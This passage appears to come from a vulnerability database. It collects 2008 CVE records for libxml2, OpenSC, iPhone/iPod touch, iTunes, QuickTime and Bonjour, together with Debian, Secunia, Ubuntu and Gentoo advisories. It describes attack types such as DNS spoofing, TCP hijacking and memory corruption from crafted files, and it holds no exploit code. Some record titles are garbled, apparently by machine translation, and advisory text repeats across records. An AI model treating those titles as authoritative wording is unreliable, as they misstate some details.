upgrade your libxml2 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz Size/MD5 checksum: 220443 48cafbb8d1bd2c6093339fea3f14e4a0 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz Size/MD5 checksum: 3416175 5ff71b22f6253a6dd9afc1c34778dec3 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc Size/MD5 checksum: 893 0dc1f183dd20741e5b4e26a7f8e1c652 Architecture independent packages: http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb Size/MD5 checksum: 1328144 c1c5f0ceb391893a94e61c074b677ee9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 820850 fac5556241bb0fde20913f25fb9c73ac http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 37980 725b1c6925e610b5843ba0ad554dc7bc http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 184754 5ccbaf07b44dcfe528167074050bf270 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 916830 17d71480b7e2a447dabde99c11d752fa http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 881834 cac19a28b37f7afb9e07966f44ddd5b2 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 184130 a13372752d162d0fb2ccd58da6b73e20 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 36684 8a0265229bebf9245dc7bb7cc6f41d36 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 796194 6019e59020269cca8fa8fea40f83c118 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 891922 606fc28448bead2709c39a1d3e529a25 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 745758 95bd39eb2818772c43c3351b22326fcd arm architecture (ARM) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 741876 1b670c6bac3aa9f7df28f7ea3f1e5725 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 34678 9a992dc251b137a919a813eed2af8489 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 165290 732b4e94b91a086c6b950d187af160bc http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 817514 299c93a812ac02a8aa9da88f4cb5aedf http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 673192 d2ff2c26ee8dae05f81c24aa6dfce9b5 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 191876 4d2e33090237b47bc10e9526329f0bc5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 36708 0ebf8554c5a0e873b128d52ceafccdfd http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 850210 bde343770ac9a7bd458e68a60c2b8434 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 858660 88f67d0d2aff41333ca2f4d4b2d6b5b2 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 864474 489dbd9d677c274c07abb88d0f23b969 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 755986 9fdf341ede17d7790202229db9cc1353 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 169032 272c6be290817bf9cb8b401425fd83d5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 681472 d8a0611d638e0553da64a218fbcf291a http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 857318 6946048170dd7d142c03c13794c30d6f http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_i386.deb Size/MD5 checksum: 34496 3e3674a714f780024630ad1a2ca46eab ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 1106480 03e08564e2bf843905daecdd7c5cc4c4 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 874222 ed9ab6fa068a5b07c22ec1c10db8e0ab http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 1080186 defc5f4f9eb80872a793cc025e33a111 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 48492 5a567323dc0bf8159a6eae87957266d5 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 196536 cdbb137c8bb31cf29114673c4cb28e67 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 34418 4a05346cb2fc6c314e7e8aef21662469 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 171678 c94bfffc6bde639623ce9a91028960e5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 926922 ddc8ff03120dd78869830d38a5e8708d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 840642 57f2ea24a31904c4b07531f6292a4a8e http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 770246 20ba2586e1406d66bd34642f13265dcf mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 34398 9f0ebfb1dc37496e6b7a4e9963ffaeff http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 898346 29680d5d5baa66e251e71f55aa128e3c http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 768976 8f6464a0ef61b3ddcd271652a01c7469 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 833252 5c83c05d44526479e7c550fd0d8cbdbe http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 168690 eb56cb1ea49795d0a5a18af468625941 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 898010 c3d61392afcb383d0f27d5f91fda721d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 770994 94ef895f8942b880e8823e10420120e6 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 172726 5d097f0290be2bab9b93287bad07e83f http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 37660 e977bc38e837077de7a006ef923b98bd http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 779958 ad7245f8a9980d7f40234aefaf12a31b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 185726 91661276ed6cf371373b4e61805c81b8 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 885618 218f2603ab94bf92ba45cd330fe15782 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 806024 3abe21a0d756e5a0a2ca646f0ba32729 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 36378 cbc5eb7e2f81adafeba8e857aee8c918 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 750190 4172cb95d7aea2f9ee9331220cd5274c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 781522 c20ea9c8ab0ec798488e68c845650036 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 713144 e0139b86fbf9644678c2c6de6462bff1 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 759568 7d46f7ceb214711851cc1f27edef2c48 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 34580 fceb65808b2c98f621d79352eea9d2d5 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 176874 f27821fe07861f2e71658bc3eb0a595e These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD4DBQFI9N2RwM/Gs81MDZ0RAqP7AJYxbWnJqF4zauFOietE80FTYW02AKDCOBt2 wvZ3MJ4FZeRn990jpLrh1A== =FZQi -----END PGP SIGNATURE-----
VAR-200809-0570 CVE-2008-3972 OpenSC of pkcs15-tool Vulnerabilities exploiting vulnerabilities in CVSS V2: 6.6
CVSS V3: -
Severity: MEDIUM
pkcs15-tool in OpenSC before 0.11.6 does not apply security updates to a smart card unless the card's label matches the "OpenSC" string, which might allow physically proximate attackers to exploit vulnerabilities that the card owner expected were patched, as demonstrated by exploitation of CVE-2008-2235. Opensc is prone to a local security vulnerability. OpenSC is a smart card program and application library. ---------------------------------------------------------------------- Do you need accurate and reliable IDS / IPS / AV detection rules? Get in-depth vulnerability details: http://secunia.com/binary_analysis/sample_analysis/ ---------------------------------------------------------------------- TITLE: SUSE Update for Multiple Packages SECUNIA ADVISORY ID: SA32099 VERIFY ADVISORY: http://secunia.com/advisories/32099/ CRITICAL: Highly critical IMPACT: Security Bypass, Exposure of sensitive information, Privilege escalation, DoS, System access WHERE: >From remote OPERATING SYSTEM: SUSE Linux Enterprise Server 9 http://secunia.com/advisories/product/4118/ SUSE Linux Enterprise Server 10 http://secunia.com/advisories/product/12192/ openSUSE 11.0 http://secunia.com/advisories/product/19180/ openSUSE 10.3 http://secunia.com/advisories/product/16124/ openSUSE 10.2 http://secunia.com/advisories/product/13375/ SOFTWARE: Novell Open Enterprise Server 1.x http://secunia.com/advisories/product/4664/ DESCRIPTION: SUSE has issued an update for multiple packages. ---------------------------------------------------------------------- Secunia is pleased to announce the release of the annual Secunia report for 2008. Highlights from the 2008 report: * Vulnerability Research * Software Inspection Results * Secunia Research Highlights * Secunia Advisory Statistics Request the full 2008 Report here: http://secunia.com/advisories/try_vi/request_2008_report/ Stay Secure, Secunia ---------------------------------------------------------------------- TITLE: Fedora update for opensc SECUNIA ADVISORY ID: SA34362 VERIFY ADVISORY: http://secunia.com/advisories/34362/ DESCRIPTION: Fedora has issued an update for opensc. This fixes some security issues, which can be exploited by malicious people to bypass certain security restrictions. For more information: SA31330 SA34052 SOLUTION: Apply updated packages using the yum utility ("yum update opensc"). ORIGINAL ADVISORY: FEDORA-2009-2267: https://www.redhat.com/archives/fedora-package-announce/2009-March/msg00686.html OTHER REFERENCES: SA31330: http://secunia.com/advisories/31330/ SA34052: http://secunia.com/advisories/34052/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0572 CVE-2008-3631 Apple iPod touch and iPhone of Application Sandbox Vulnerable to reading arbitrary files CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Application Sandbox in Apple iPod touch 2.0 through 2.0.2, and iPhone 2.0 through 2.0.2, does not properly isolate third-party applications, which allows attackers to read arbitrary files in a third-party application's sandbox via a different third-party application. Apple iPod touch and iPhone are prone to multiple remote vulnerabilities: 1. A vulnerability that may allow users to spoof websites. 2. An information-disclosure vulnerability. 3. A remote code-execution vulnerability. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. These issues affect versions prior to iPod touch 2.1 and iPhone 2.1. ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple iPod Touch Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31823 VERIFY ADVISORY: http://secunia.com/advisories/31823/ CRITICAL: Highly critical IMPACT: Hijacking, Security Bypass, Spoofing, Exposure of sensitive information, System access WHERE: >From remote OPERATING SYSTEM: Apple iPod touch http://secunia.com/advisories/product/16074/ DESCRIPTION: Multiple vulnerabilities have been reported in Apple iPod touch, which can be exploited by malicious applications to bypass certain security features and by malicious people to poison the DNS cache, spoof TCP connections, or potentially compromise a user's device. This can be exploited by one application to read another application's files. 2) Multiple errors exist in the included version of FreeType, which potentially can be exploited by malicious people to execute arbitrary code when accessing specially crafted font data. For more information: SA30600 3) mDNSResponder does not provide sufficient randomization, which can be exploited to poison the DNS cache. For more information: SA30973 4) Generation of predictable TCP initial sequence numbers can be exploited to spoof TCP connections or hijack sessions. 5) A use-after-free error in WebKit when handling CSS import statements can potentially be exploited to execute arbitrary code via a specially crafted website. SOLUTION: Update to version 2.1. PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Nicolas Seriot of Sen:te and Bryce Cogswell. 3) The vendor credits Dan Kaminsky, IOActive. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3026 OTHER REFERENCES: SA30600: http://secunia.com/advisories/30600/ SA30973: http://secunia.com/advisories/30973/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . For more information: SA31823 An error in the handling of emergency calls has also been reported. This can be exploited to bypass the Passcode Lock feature and allows users with physical access to an iPhone to launch applications without the passcode
VAR-200809-0567 CVE-2008-3612 Apple iPod touch  and  iPhone  In  TCP  Vulnerability with predictable initial sequence number CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
The Networking subsystem in Apple iPod touch 2.0 through 2.0.2, and iPhone 2.0 through 2.0.2, uses predictable TCP initial sequence numbers, which allows remote attackers to spoof or hijack a TCP connection. Apple iPod touch and iPhone are prone to multiple remote vulnerabilities: 1. A vulnerability that may allow users to spoof websites. 2. An information-disclosure vulnerability. 3. A remote code-execution vulnerability. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. These issues affect versions prior to iPod touch 2.1 and iPhone 2.1. ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple iPod Touch Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31823 VERIFY ADVISORY: http://secunia.com/advisories/31823/ CRITICAL: Highly critical IMPACT: Hijacking, Security Bypass, Spoofing, Exposure of sensitive information, System access WHERE: >From remote OPERATING SYSTEM: Apple iPod touch http://secunia.com/advisories/product/16074/ DESCRIPTION: Multiple vulnerabilities have been reported in Apple iPod touch, which can be exploited by malicious applications to bypass certain security features and by malicious people to poison the DNS cache, spoof TCP connections, or potentially compromise a user's device. 1) An error in the application sandbox causes it to not properly enforce access restrictions between third-party applications. This can be exploited by one application to read another application's files. 2) Multiple errors exist in the included version of FreeType, which potentially can be exploited by malicious people to execute arbitrary code when accessing specially crafted font data. For more information: SA30600 3) mDNSResponder does not provide sufficient randomization, which can be exploited to poison the DNS cache. 5) A use-after-free error in WebKit when handling CSS import statements can potentially be exploited to execute arbitrary code via a specially crafted website. SOLUTION: Update to version 2.1. PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Nicolas Seriot of Sen:te and Bryce Cogswell. 3) The vendor credits Dan Kaminsky, IOActive. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3026 OTHER REFERENCES: SA30600: http://secunia.com/advisories/30600/ SA30973: http://secunia.com/advisories/30973/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . For more information: SA31823 An error in the handling of emergency calls has also been reported. This can be exploited to bypass the Passcode Lock feature and allows users with physical access to an iPhone to launch applications without the passcode
VAR-200809-0573 CVE-2008-3632 Apple iPod touch and iPhone of WebKit In Cascading Style sheet (CSS) Vulnerabilities CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Use-after-free vulnerability in WebKit in Apple iPod touch 1.1 through 2.0.2, and iPhone 1.0 through 2.0.2, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a web page with crafted Cascading Style Sheets (CSS) import statements. Apple iPod touch and iPhone are prone to multiple remote vulnerabilities: 1. A vulnerability that may allow users to spoof websites. 2. An information-disclosure vulnerability. 3. A remote code-execution vulnerability. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. These issues affect versions prior to iPod touch 2.1 and iPhone 2.1. 1) An error in the application sandbox causes it to not properly enforce access restrictions between third-party applications. This can be exploited by one application to read another application's files. 2) Multiple errors exist in the included version of FreeType, which potentially can be exploited by malicious people to execute arbitrary code when accessing specially crafted font data. For more information: SA30600 3) mDNSResponder does not provide sufficient randomization, which can be exploited to poison the DNS cache. For more information: SA30973 4) Generation of predictable TCP initial sequence numbers can be exploited to spoof TCP connections or hijack sessions. 3) The vendor credits Dan Kaminsky, IOActive. For more information: SA31823 An error in the handling of emergency calls has also been reported. This can be exploited to bypass the Passcode Lock feature and allows users with physical access to an iPhone to launch applications without the passcode. ---------------------------------------------------------------------- Do you have VARM strategy implemented? (Vulnerability Assessment Remediation Management) If not, then implement it through the most reliable vulnerability intelligence source on the market. Implement it through Secunia. For more information visit: http://secunia.com/advisories/business_solutions/ Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com ---------------------------------------------------------------------- TITLE: Apple Safari Multiple Vulnerabilities SECUNIA ADVISORY ID: SA35379 VERIFY ADVISORY: http://secunia.com/advisories/35379/ DESCRIPTION: Some vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to disclose sensitive information or compromise a user's system. 1) An error in the handling of TrueType fonts can be exploited to corrupt memory when a user visits a web site embedding a specially crafted font. Successful exploitation may allow execution of arbitrary code. 2) Some vulnerabilities in FreeType can potentially be exploited to compromise a user's system. For more information: SA34723 3) Some vulnerabilities in libpng can potentially be exploited to compromise a user's system. For more information: SA33970 4) An error in the processing of external entities in XML files can be exploited to read files from the user's system when a users visits a specially crafted web page. Other vulnerabilities have also been reported of which some may also affect Safari version 3.x. SOLUTION: Upgrade to Safari version 4, which fixes the vulnerabilities. PROVIDED AND/OR DISCOVERED BY: 1-3) Tavis Ormandy 4) Chris Evans of Google Inc. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3613 Chris Evans: http://scary.beasts.org/security/CESA-2009-006.html OTHER REFERENCES: SA33970: http://secunia.com/advisories/33970/ SA34723: http://secunia.com/advisories/34723/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . =========================================================== Ubuntu Security Notice USN-676-1 November 24, 2008 webkit vulnerability CVE-2008-3632 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.10: libwebkit-1.0-1 1.0.1-2ubuntu0.1 After a standard system upgrade you need to restart any applications that use WebKit, such as Epiphany-webkit and Midori, to effect the necessary changes
VAR-200809-0206 CVE-2008-3634 Apple Mac OS X upper Apple iTunes Issue with incorrect information displayed on the firewall CVSS V2: 2.6
CVSS V3: -
Severity: LOW
Apple iTunes before 8.0 on Mac OS X 10.4.11, when iTunes Music Sharing is enabled but blocked by the host-based firewall, presents misleading information about firewall security, which might allow remote attackers to leverage an exposure that would be absent if the administrator were given better information. This issue may lead to a false sense of security, potentially aiding in network-based attacks. Versions prior to Apple iTunes 8.0 are vulnerable to this issue
VAR-200809-0201 CVE-2008-3628 Windows upper Apple QuickTime In PICT Vulnerabilities related to illegal pointers in image processing CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, related to an "invalid pointer issue.". These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: - CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability') - CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player. ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31821 VERIFY ADVISORY: http://secunia.com/advisories/31821/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Apple QuickTime 7.x http://secunia.com/advisories/product/5090/ DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file. 2) A boundary error in QuickTimeInternetExtras.qtx when parsing files via the third-party Indeo3.2 codec for QuickTime can be exploited to cause a stack-based buffer overflow via a specially crafted movie file. 3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file. 4) A boundary error in the parsing of panorama PDAT atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a stack-based buffer overflow via a QTVR file containing specially crafted "maxTilt", "minFieldOfView", and "maxFieldOfView" elements. 6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing a overly large entry in sample_size_table. 7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Update to version 7.5.5. QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Paul Byrne, NGSSoftware. 2) Reported by an anonymous person via ZDI. 3) The vendor credits Roee Hay, IBM Rational Application Security Research Group. 4) Reported by an anonymous person via ZDI. 5) Reported by an anonymous person via iDefense VCP. 6) Reported by an anonymous person via ZDI. 7) Reported by an anonymous person and Subreption via ZDI. 8) The vendor credits David Wharton. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3027 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-08-057/ http://www.zerodayinitiative.com/advisories/ZDI-08-058/ http://www.zerodayinitiative.com/advisories/ZDI-08-059/ http://www.zerodayinitiative.com/advisories/ZDI-08-060/ http://www.zerodayinitiative.com/advisories/ZDI-08-061/ http://www.zerodayinitiative.com/advisories/ZDI-08-062/ iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0203 CVE-2008-3630 Windows for Apple Bonjour of Bonjour Namespace Provider In DNS Vulnerability forged response CVSS V2: 6.4
CVSS V3: -
Severity: MEDIUM
mDNSResponder in Apple Bonjour for Windows before 1.0.5, when an application uses the Bonjour API for unicast DNS, does not choose random values for transaction IDs or source ports in DNS requests, which makes it easier for remote attackers to spoof DNS responses, a different vulnerability than CVE-2008-1447. this is CVE-2008-1447 Is a different vulnerability.By a third party DNS The response may be spoofed and spoofed as a legitimate address. An attacker may leverage this issue to forge unicast hostname resolution responses in applications that may use the application's API for DNS. Successful exploits allow attackers to redirect network traffic, which can aid in man-in-the-middle attacks. Versions prior to Bonjour for Windows 1.0.5, included in Apple iTunes 8.0, are vulnerable to this issue. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201201-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: mDNSResponder: Multiple vulnerabilities Date: January 20, 2012 Bugs: #290822 ID: 201201-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in mDNSResponder, which could lead to execution of arbitrary code with root privileges. Background ========== mDNSResponder is a component of Apple's 